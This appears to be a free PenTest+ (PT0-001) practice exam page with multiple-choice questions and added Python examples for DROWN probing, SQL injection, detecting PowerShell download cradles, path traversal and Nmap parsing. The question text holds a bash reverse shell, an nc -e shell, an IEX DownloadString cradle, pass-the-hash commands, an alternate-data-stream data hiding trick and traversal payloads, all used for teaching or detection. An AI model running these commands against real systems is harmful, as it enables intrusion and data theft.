
Note! PT0-001 has been withdrawn. The new exam code is PT0-002

Practice Free PT0-001 CompTIA PenTest+ Exam Questions and Answers With Explanation

We at Crack4sure are committed to giving students who are preparing for the CompTIA PT0-001 exam the most current and reliable questions. To help people study, we have made some of our CompTIA PenTest+ exam materials available for free to everyone. You can take the free PT0-001 practice test as many times as you want. Answers to the practice questions are provided, and each answer is explained.

Question # 6

A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443. The penetration tester observes the following output:

[Scan output image not reproduced on this page]

Which of the following has MOST likely occurred?

A.

The scan results were a false positive.

B.

The IPS is blocking traffic to port 443.

C.

A mismatched firewall rule is blocking 443.

D.

The organization moved services to port 8443.

Question # 7

A penetration tester is attempting to scan a legacy web application using the scanner's default scan settings. The scans continually result in the application becoming unresponsive. Which of the following can help to alleviate this issue?

A.

Packet shaping

B.

Flow control

C.

Bandwidth limits

D.

Query throttling

Question # 8

Which of the following BEST describes why an MSA is helpful?

A.

It contractually binds both parties to not disclose vulnerabilities.

B.

It reduces potential for scope creep.

C.

It clarifies the business arrangement by agreeing to specific terms.

D.

It defines the timelines for the penetration test.

Question # 9

A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?

A.

openssl s_client -tls1_2 -connect 127.212.31.17:443

B.

openssl s_client -ssl2 -connect 127.212.31.17:443

C.

openssl s_client -ssl3 -connect 127.212.31.17:443

D.

openssl s_server -tls1_2 -connect 127.212.31.17:443
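DROWN (CVE-2016-0800) is only exploitable when the server, or another server sharing the same private key, still accepts SSLv2. The practical problem with verifying the scanner's claim is that most current OpenSSL builds no longer include SSLv2, so `openssl s_client -ssl2` fails on the tester's side rather than on the target's. The following is an added example (not part of the exam material or of any vendor tool) that talks SSLv2 directly: it builds a raw SSLv2 CLIENT-HELLO, sends it, and only reports a true positive if the target answers with an SSLv2 SERVER-HELLO. The host, port and the sample server response are assumptions constructed for the example.

```python
import os
import socket
import struct

# SSLv2 cipher-spec codes (3 bytes each) as listed in the SSL 2.0 draft.
SSLV2_CIPHERS = {
    b"\x01\x00\x80": "SSL2_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL2_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL2_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL2_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL2_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL2_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL2_DES_192_EDE3_CBC_WITH_MD5",
}


def build_sslv2_client_hello(challenge=None):
    """Build an SSLv2 CLIENT-HELLO that offers every SSLv2 cipher spec."""
    challenge = challenge if challenge is not None else os.urandom(16)
    specs = b"".join(SSLV2_CIPHERS)
    body = (
        b"\x01"                                    # message type: CLIENT-HELLO
        + b"\x00\x02"                              # client version: SSL 2.0
        + struct.pack(">HHH", len(specs), 0, len(challenge))  # spec/session/challenge lengths
        + specs                                    # cipher specs, 3 bytes each
        + challenge                                # empty session id, then challenge
    )
    # Two-byte SSLv2 record header: high bit set, 15-bit body length.
    return struct.pack(">H", 0x8000 | len(body)) + body


def parse_sslv2_server_hello(data):
    """Return the server version and cipher list if `data` is an SSLv2
    SERVER-HELLO, else None. TLS records start with 0x15/0x16, which never
    has the SSLv2 high bit set, so a TLS alert is correctly rejected."""
    if len(data) < 2 or not data[0] & 0x80:
        return None
    length = ((data[0] & 0x7F) << 8) | data[1]
    body = data[2:2 + length]
    if len(body) < 11 or body[0] != 0x04:          # 4 = SERVER-HELLO
        return None
    version = struct.unpack(">H", body[3:5])[0]
    cert_len, spec_len, _conn_len = struct.unpack(">HHH", body[5:11])
    specs = body[11 + cert_len:11 + cert_len + spec_len]
    ciphers = [SSLV2_CIPHERS.get(specs[i:i + 3], specs[i:i + 3].hex())
               for i in range(0, len(specs), 3)]
    return {"version": version, "ciphers": ciphers}


def probe_sslv2(host, port=443, timeout=5.0):
    """Send the CLIENT-HELLO to a live host and parse the reply.
    Needs network access; the offline sample below does not call it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv2_client_hello())
        return parse_sslv2_server_hello(sock.recv(4096))


# Constructed sample responses (not captured from any real host).
# A minimal SERVER-HELLO with an empty certificate field and two cipher specs.
_SAMPLE_SPECS = b"\x01\x00\x80" + b"\x07\x00\xc0"
_SAMPLE_BODY = (b"\x04" + b"\x00" + b"\x01" + b"\x00\x02"
                + struct.pack(">HHH", 0, len(_SAMPLE_SPECS), 16)
                + _SAMPLE_SPECS + b"\x00" * 16)
SAMPLE_SSLV2_SERVER_HELLO = struct.pack(">H", 0x8000 | len(_SAMPLE_BODY)) + _SAMPLE_BODY
# A TLS 1.0 fatal "protocol_version" alert, the usual answer from a patched server.
SAMPLE_TLS_ALERT = b"\x15\x03\x01\x00\x02\x02\x46"

if __name__ == "__main__":
    print("vulnerable host would answer:", parse_sslv2_server_hello(SAMPLE_SSLV2_SERVER_HELLO))
    print("patched host would answer:   ", parse_sslv2_server_hello(SAMPLE_TLS_ALERT))
    # probe_sslv2("127.212.31.17")  # live check against the exam's example address
```

A `None` result from the live probe means the scanner finding on that port is a false positive. Keep in mind that DROWN is a cross-protocol attack: if the same RSA key is used by any other SSLv2-speaking service (an old mail server, for example), the finding stands even though 443 itself is clean.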

Question # 10

Which of the following would BEST prevent fence jumping at a facility?

A.

Install proper lighting around the perimeter of the facility.

B.

Decrease the distance between the links in the fence.

C.

Add a top guard on the fence that faces away from the facility.

D.

Place video cameras that are angled toward the fence.

Question # 11

During an internal network penetration test, the tester is able to compromise a Windows system and recover the NTLM hash for a local WrkStnAdmin account. Attempting to recover the plaintext password by cracking the hash has proved unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems. Using the Medusa tool, the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success. Given the output below:

[Medusa output image not reproduced on this page]

Which of the following Medusa commands would potentially provide better results?

A.

#medusa -h hosts.txt -U users.txt -P hashes.txt -M smbnt -m GROUP:LOCAL -O out.txt -m PASS:HASH

B.

#medusa -H hosts.txt -U users.txt -P hashes.txt -M smbnt -m PASS:HASH -o out.txt

C.

#medusa -H hosts.txt -u WrkStnAdmin -p aa3b435b51404eeaa3b435b51404ee:4e63c1b137e274dda214154b349fe316 -M smbnt -m GROUP:DOMAIN -o out.txt

D.

#medusa -H hosts.txt -C creds.txt -M mssql -m GROUP:DOMAIN -o out.txt

Question # 12

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.
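An unquoted service path only matters when the image path contains spaces and the service runs as a more privileged account: the Service Control Manager then tries `C:\Program.exe`, `C:\Program Files\Acme.exe`, and so on, before the real binary. The following is an added example (not part of the exam material) that takes `wmic service get Name,PathName /format:list` style output and computes exactly which file names Windows would try first for each unquoted service. The service names, paths and the sample output are constructed for the example; whether a candidate is actually exploitable still depends on the low-privilege user being able to write to that directory and on being able to restart the service or reboot.

```python
import re

# Constructed sample in the shape of `wmic service get Name,PathName /format:list`
# output; not taken from any real host.
SAMPLE_WMIC_OUTPUT = """\
Name=EventLog
PathName=C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted

Name=BackupAgent
PathName=C:\\Program Files\\Acme Backup\\agent\\backup agent.exe -service

Name=Updater
PathName="C:\\Program Files\\Acme Updater\\updater.exe" /quiet
"""

_IMAGE_RE = re.compile(r"(.*?\.exe)", re.IGNORECASE)


def parse_wmic_services(text):
    """Yield (name, pathname) pairs from /format:list style output."""
    name = None
    for line in text.splitlines():
        if line.startswith("Name="):
            name = line[len("Name="):].strip()
        elif line.startswith("PathName=") and name is not None:
            yield name, line[len("PathName="):].strip()
            name = None


def image_path(pathname):
    """Strip service arguments: everything up to the first '.exe' is the image."""
    m = _IMAGE_RE.match(pathname)
    return m.group(1) if m else pathname.split(" ")[0]


def is_unquoted_with_spaces(pathname):
    """The precondition: no surrounding quotes and a space inside the image path."""
    if pathname.startswith('"'):
        return False
    return " " in image_path(pathname)


def hijack_candidates(pathname):
    """For C:\\A B\\C D\\x.exe return the executables Windows tries before x.exe:
    C:\\A.exe, then C:\\A B\\C.exe. Each candidate lives in the directory whose
    permissions decide whether this is privilege escalation (options C and D)."""
    parts = image_path(pathname).split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if "\\" in prefix:                       # must still be a path, not a bare word
            candidates.append(prefix + ".exe")
    return candidates


def find_unquoted_services(text):
    """Map each vulnerable service name to the ordered list of hijack candidates."""
    return {name: hijack_candidates(path)
            for name, path in parse_wmic_services(text)
            if is_unquoted_with_spaces(path)}


if __name__ == "__main__":
    for svc, cands in find_unquoted_services(SAMPLE_WMIC_OUTPUT).items():
        print(svc)
        for c in cands:
            print("   ", c)
```

On a real host, follow up each candidate with `icacls` (or Sysinternals `accesschk -wvu`) on its parent directory; a directory where the current user has write or create-file rights is the one worth reporting.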

Question # 13

A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)

A.

-O

B.

-iL

C.

-sV

D.

-sS

E.

-oN

F.

-oX

Question # 14

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?

A.

a=1 or 1--

B.

1=1 or b--

C.

1=1 or 2--

D.

1=1 or a--
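The distinction the question is after is behavioural: an error-based payload makes the database raise an error whose text is reflected back (a reference to a column that does not exist, for instance), whereas a tautology such as `1=1 or 2--` silently widens the result set, which is boolean-based injection. The following is an added example (not part of the exam material) that runs the four option payloads against a constructed SQLite table through a string-concatenated query, classifies each outcome, and shows the parameterized query that neutralises all of them. The table, rows and query shape are assumptions for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database; not from any real application."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, user_input):
    """String-concatenated query: the injection point the payloads target."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, user_input):
    """Parameterized query: the input is bound as a value, never parsed as SQL."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,))
    return [row[0] for row in rows]


def classify(conn, payload):
    """Label what a payload achieves against the vulnerable query:
    'error'     -> the database error text leaks back (error-based),
    'tautology' -> every row comes back (boolean-based),
    'normal'    -> behaves like an ordinary lookup."""
    try:
        rows = lookup_vulnerable(conn, payload)
    except sqlite3.Error as exc:
        return "error", str(exc)
    return ("tautology" if len(rows) > 1 else "normal"), rows


PAYLOADS = ["a=1 or 1--", "1=1 or b--", "1=1 or 2--", "1=1 or a--", "1"]

if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        print(f"{p!r:16} vulnerable -> {classify(db, p)}")
        print(f"{'':16} fixed      -> {lookup_fixed(db, p)}")
```

Against SQLite, every payload that names a non-existent column (`a` or `b`) comes back as `no such column`, which is the error text an attacker reads to map the schema; `1=1 or 2--` returns all three rows without any error. The parameterized version returns `['alice']` for `"1"` and nothing for every injection string, because the whole string is compared as a value.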

Question # 15

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://site/script.ps1");Invoke-Cmdlet

Which of the following BEST describes the actions performed this command?

A.

Set the execution policy

B.

Execute a remote script

C.

Run an encoded command

D.

Instantiate an object
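The command above is a download cradle: `Net.WebClient.DownloadString` fetches the script body and `IEX` (Invoke-Expression) runs it in memory, so nothing touches disk. On the defensive side the same pattern is what a detection over process-creation logs (Sysmon Event ID 1 or Windows 4688 command lines) should key on, together with its common variants: `-EncodedCommand` with a Base64 UTF-16LE payload, `-ExecutionPolicy Bypass`, and a hidden window. The following is an added example (not part of the exam material or of any product's rule set) that scores constructed command lines, decodes an encoded command and re-scans the decoded text. The sample command lines are constructed for the example.

```python
import base64
import re

# Constructed sample command lines in the shape of a CommandLine field; not from a real host.
SAMPLE_COMMAND_LINES = [
    'powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://site/script.ps1");Invoke-Cmdlet',
    'powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'powershell.exe -Command "Get-ChildItem C:\\Logs | Measure-Object"',
]

# powershell.exe accepts unique prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "web_download": re.compile(
        r"\b(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|"
        r"Invoke-RestMethod|Start-BitsTransfer)\b", re.I),
    "webclient_object": re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I),
    "encoded_command": ENCODED_FLAG,
    "policy_bypass": re.compile(r"-e(?:x(?:ecutionpolicy)?|p)\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def scan(text):
    """Return the set of indicator names that match `text`."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def decode_encoded_command(cmdline):
    """-EncodedCommand carries Base64 of the UTF-16LE script text."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Scan the raw command line, then the decoded payload if there is one,
    and apply a simple cradle rule over the combined indicators."""
    hits = scan(cmdline)
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits |= scan(decoded)
    suspicious = (
        "encoded_command" in hits
        or ("invoke_expression" in hits and "web_download" in hits)
        or ("web_download" in hits and ("policy_bypass" in hits or "hidden_window" in hits))
    )
    return {"hits": hits, "decoded": decoded, "suspicious": suspicious}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze(line)
        print(("ALERT " if r["suspicious"] else "ok    "), sorted(r["hits"]), r["decoded"])
```

Treat the rule as a starting point: Script Block Logging (Event ID 4104) sees the script after `IEX` has expanded it and catches obfuscation that command-line matching misses, so the two sources should be used together.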

Question # 16

During post-exploitation, a tester identifies that only system binaries will pass an egress filter and stores a file with the following command:

type c:\creditcards.db > c:\windows\system32\calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

A.

Hierarchical file system

B.

Alternate data streams

C.

Backdoor success

D.

Extended file system

Question # 17

A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A.

Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

B.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.

C.

Notify the development team of the discovery and suggest that input validation be implemented on the web application's SQL query strings.

D.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

Question # 18

Which of the following BEST describes the difference between a red team engagement and a penetration test?

A.

A penetration test has a broad scope and emulates advanced persistent threats while a red team engagement has a limited scope and focuses more on vulnerability identification

B.

A red team engagement has a broad scope and emulates advanced persistent threats, while a penetration test has a limited scope and focuses more on vulnerability identification

C.

A red team engagement has a broad scope and focuses more on vulnerability identification, while a penetration test has a limited scope and emulates advanced persistent threats

D.

A penetration test has a broad scope and focuses more on vulnerability identification while a red team engagement has a limited scope and emulates advanced persistent threats

Question # 19

Which of the following types of physical security attacks does a mantrap mitigate?

A.

Lock picking

B.

Impersonation

C.

Shoulder surfing

D.

Tailgating

Question # 20

In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

A.

Brute force the user's password.

B.

Perform an ARP spoofing attack.

C.

Leverage the BeEF framework to capture credentials.

D.

Conduct LLMNR/NBT-NS poisoning.

Question # 21

A penetration tester must assess a web service. Which of the following should the tester request during the scoping phase?

A.

XSD

B.

After-hours contact escalation

C.

WSDL file

D.

SOAP project file

Question # 22

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

A.

Karma

B.

Kismet

C.

Pixie

D.

NetStumbler

Question # 23

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

A.

Disable the network port of the affected service.

B.

Complete all findings, and then submit them to the client.

C.

Promptly alert the client with details of the finding.

D.

Take the target offline so it cannot be exploited by an attacker.

Question # 24

Prior to a security assessment of a company's user population via spear phishing, which of the following is the MOST appropriate method to de-escalate any incidents or consequences?

A.

Determine the appropriate format and content of the spear-phishing emails.

B.

Send follow-up communication to spear-phishing targets to notify of the assessment.

C.

Carefully prioritize the list of targeted users, excluding high value targets.

D.

Provide limited but necessary communication prior to the assessment.

Question # 25

Which of the following commands starts the Metasploit database?

A.

msfconsole

B.

workspace

C.

msfvenom

D.

db_init

E.

db_connect

Question # 26

A penetration tester has gained physical access to a facility and connected directly into the internal network. The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

A.

Spoofing a printer’s MAC address

B.

Abusing DTP negotiation

C.

Performing LLMNR poisoning

D.

Conducting an STP attack

Question # 27

A recent vulnerability scan of all web servers in an environment offers the following results:

[Vulnerability scan results image not reproduced on this page]

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

A.

Unrestricted file upload, clickjacking, verbose server banner, SQL injection

B.

Unrestricted file upload, SQL injection, clickjacking, verbose server banner

C.

Clickjacking, unrestricted file upload, verbose server banner, SQL injection

D.

SQL injection, unrestricted file upload, clickjacking, verbose server banner

E.

SQL injection, clickjacking, unrestricted file upload, verbose server banner

Question # 28

A penetration tester ran the following Nmap scan on a computer:

nmap -sV 192.168.1.5

The organization said it had disabled Telnet in its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open, with SSH identified as the service. Which of the following is the BEST explanation for what happened?

A.

The organization failed to disable Telnet.

B.

Nmap results contain a false positive for port 23.

C.

Port 22 was filtered.

D.

The service is running on a non-standard port.
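The tell in the scenario is that `-sV` identifies the service by its banner and probes, not by port number, so "SSH on 23" means the administrators moved SSH to the old Telnet port rather than that Telnet is still running. The following is an added example (not part of the exam material) that parses Nmap's grepable (`-oG`) output and flags every open port whose detected service does not match what that port number normally carries. The scan output is constructed for the example, and the port-to-service table is a small assumed subset that a tester would extend.

```python
import re

# Constructed sample of `nmap -sV -oG -` output for one host; not a real scan.
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 192.168.1.5
Host: 192.168.1.5 ()\tStatus: Up
Host: 192.168.1.5 ()\tPorts: 22/closed/tcp//ssh///, 23/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/open/tcp//http//nginx 1.18.0/\tIgnored State: filtered (997)
# Nmap done
"""

# What the port number normally carries (IANA names as Nmap reports them).
EXPECTED_SERVICE = {
    21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "domain", 80: "http",
    110: "pop3", 143: "imap", 443: "https", 445: "microsoft-ds", 3389: "ms-wbt-server",
}

# Grepable port entry: port/state/proto/owner/service/rpcinfo/version/
# (owner and rpcinfo are almost always empty; version is assumed slash-free here).
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return one dict per port entry found on 'Host: ... Ports:' lines."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            results.append({"host": host, "port": int(port), "state": state,
                            "proto": proto, "service": service, "version": version.strip()})
    return results


def nonstandard_services(results):
    """Open ports whose -sV service name differs from the port's usual service."""
    flagged = []
    for r in results:
        expected = EXPECTED_SERVICE.get(r["port"])
        if r["state"] == "open" and expected and r["service"] and r["service"] != expected:
            flagged.append((r["host"], r["port"], expected, r["service"]))
    return flagged


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_GREPABLE)
    for host, port, expected, actual in nonstandard_services(scan):
        print(f"{host}:{port} expected {expected}, found {actual}")
```

Run against the exam's scenario, the only flag is port 23 carrying `ssh`; the closed port 22 is ignored because a closed port has no banner to disagree with.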

Question # 29

During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

A.

Shell binary placed in C:\windows\temp

B.

Modified daemons

C.

New user creation

D.

Backdoored executables

Question # 30

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

A.

LSASS

B.

SAM database

C.

Active Directory

D.

Registry

Question # 31

A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester's BEST course of action?

A.

Send the report since the systems administrator will be in charge of implementing the fixes.

B.

Send the report and carbon copy the point of contact/signatory for visibility.

C.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

D.

Forward the request to the point of contact/signatory for authorization.

Question # 32

Which of the following has a direct and significant impact on the budget of the security assessment?

A.

Scoping

B.

Scheduling

C.

Compliance requirement

D.

Target risk

Question # 33

Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on site. Which of the following would be MOST effective in accomplishing this?

A.

Badge cloning

B.

Lock picking

C.

Tailgating

D.

Piggybacking

Question # 34

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http://www.company-site.com/about.php?i=../../../../../etc/passwd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration
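The request above passes a relative path through a parameter that the application joins onto its document root; enough `../` segments walk out of the web root to `/etc/passwd`. The following is an added example (not part of the exam material) that shows the naive join beside a hardened resolver which decodes the parameter, normalises it and refuses anything that leaves the base directory, plus the check a log reviewer would apply to spot encoded and double-encoded variants. The document root and the sample parameters are assumptions for the example; it normalises lexically only, so a production fix should additionally `realpath` the result to defeat symlinks.

```python
import posixpath as pp
import urllib.parse

BASE = "/var/www/pages"   # assumed document root of the vulnerable include


def decode_param(value, rounds=2):
    """Percent-decode repeatedly so %2e%2e%2f and %252e%252e%252f both surface
    as '../'; proxies and frameworks often decode more than once as well."""
    for _ in range(rounds):
        new = urllib.parse.unquote(value)
        if new == value:
            break
        value = new
    return value


def resolve_vulnerable(param):
    """Naive join: trusts whatever relative path the client supplied."""
    return pp.normpath(pp.join(BASE, param))


def resolve_hardened(param):
    """Decode, normalise, then require the result to remain under BASE.
    Returns None (reject) when the path escapes the document root."""
    candidate = decode_param(param).replace("\\", "/")
    full = pp.normpath(pp.join(BASE, candidate))
    if pp.commonpath([BASE, full]) != BASE:
        return None
    return full


def looks_like_traversal(raw_param):
    """Detection view: does the decoded parameter contain a '..' segment?"""
    decoded = decode_param(raw_param).replace("\\", "/")
    return ".." in decoded.split("/")


if __name__ == "__main__":
    # Constructed sample parameter values, including the one from the log line.
    for p in ["../../../../../etc/passwd", "team/about.txt",
              "%2e%2e%2f%2e%2e%2fetc%2fpasswd", "%252e%252e%252fetc%252fpasswd", "/etc/passwd"]:
        print(f"{p:36} vulnerable={resolve_vulnerable(decode_param(p))!s:28}"
              f"hardened={resolve_hardened(p)!s:36} traversal={looks_like_traversal(p)}")
```

Note that `pp.normpath` silently clamps surplus `..` at the root, which is why the five-level payload still lands on `/etc/passwd` no matter how deep the web root actually is; attackers over-shoot on purpose for the same reason.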

Question # 35

A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The collected credentials allow the consultant to log on to various employees' email accounts. Given the findings, which of the following should the consultant recommend be implemented?

A.

Strong password policy

B.

Password encryption

C.

Email system hardening

D.

Two-factor authentication

Question # 36

A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

A.

To allow another security consultant access to the shell

B.

To allow the developer to troubleshoot the vulnerability

C.

To allow the systems administrator to perform the cleanup

D.

To allow the systems administrator to write a rule on the WAF

Question # 37

A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

A.

Redirect the user with a CSRF.

B.

Launch the website in an iFRAME.

C.

Pull server headers.

D.

Capture and replay a session ID.

Question # 38

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometric device duplicated a valid user's fingerprint.

Question # 39

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass":

-rwsr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using "strings" to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A.

Copy changepass to a writable directory and export the ENV_PATH environment variable to the path of a token-stealing binary titled changepw. Then run changepass.

B.

Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environment variable to the path "/home/user". Then run changepass.

C.

Export the ENV_PATH environment variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.

D.

Run changepass within the current directory with sudo after exporting the ENV_PATH environment variable to the path "/usr/local/bin".

Question # 40

A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0>&1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A.

nc -nlvp 443

B.

nc 10.2.4.6 443

C.

nc -w3 10.2.4.6 443

D.

nc -e /bin/sh 10.2.4.6 443

Question # 41

A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

A.

Interrogation

B.

Elicitation

C.

Impersonation

D.

Spear phishing

Question # 42

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A.

Infrastructure is being replaced with similar hardware and software.

B.

Systems administrators are applying the wrong patches.

C.

The organization is not taking action to remediate identified findings.

D.

The penetration testing tools were misconfigured.

Question # 43

A penetration tester wants to script a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A.

nmap -p 53 -oG dnslist.txt | cut -d ":" -f 4

B.

nslookup -ns 8.8.8.8 << dnslist.txt

C.

for x in {1..254}; do dig -x 192.168.$x.$x; done

D.

dig -r > echo "8.8.8.8" >> /etc/resolv/conf
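`dig -x` builds the `in-addr.arpa` owner name for one address and asks for its PTR record, so a reverse sweep is just that query repeated over every address in scope. The following is an added example (not part of the exam material) that generalises the shell loop to any IPv4 or IPv6 CIDR, builds the reverse names the way `dig -x` does, and runs the lookups concurrently through the system resolver. The CIDR and addresses are assumptions for the example; only the name-building and range-expansion parts run offline, the sweep itself needs a resolver that holds the target zone.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def reverse_name(ip):
    """The in-addr.arpa / ip6.arpa owner name that `dig -x <ip>` queries."""
    return ipaddress.ip_address(ip).reverse_pointer


def hosts_in(cidr):
    """Every host address in the range (network and broadcast excluded for IPv4)."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(h) for h in net.hosts()]


def lookup_ptr(ip):
    """One PTR lookup via the system resolver; None when no record exists."""
    try:
        return ip, socket.gethostbyaddr(ip)[0]
    except OSError:            # socket.herror / gaierror are OSError subclasses
        return ip, None


def sweep_ptr(cidr, workers=32):
    """Concurrent reverse sweep of a CIDR; returns {ip: hostname} for hits only."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {ip: name for ip, name in pool.map(lookup_ptr, hosts_in(cidr)) if name}


if __name__ == "__main__":
    print(reverse_name("192.168.1.5"))        # 5.1.168.192.in-addr.arpa
    print(len(hosts_in("192.168.1.0/24")))    # 254
    # for ip, name in sorted(sweep_ptr("192.168.1.0/24").items()):
    #     print(ip, name)                     # live sweep, network required
```

Internal ranges usually resolve only against the client's own DNS servers, so point the resolver at an in-scope server (or pass the addresses to `dig -x @server`) rather than a public resolver such as 8.8.8.8.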

Question # 44

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A.

Enable HTTP Strict Transport Security.

B.

Enable a secure cookie flag.

C.

Encrypt the communication channel.

D.

Sanitize invalid user input.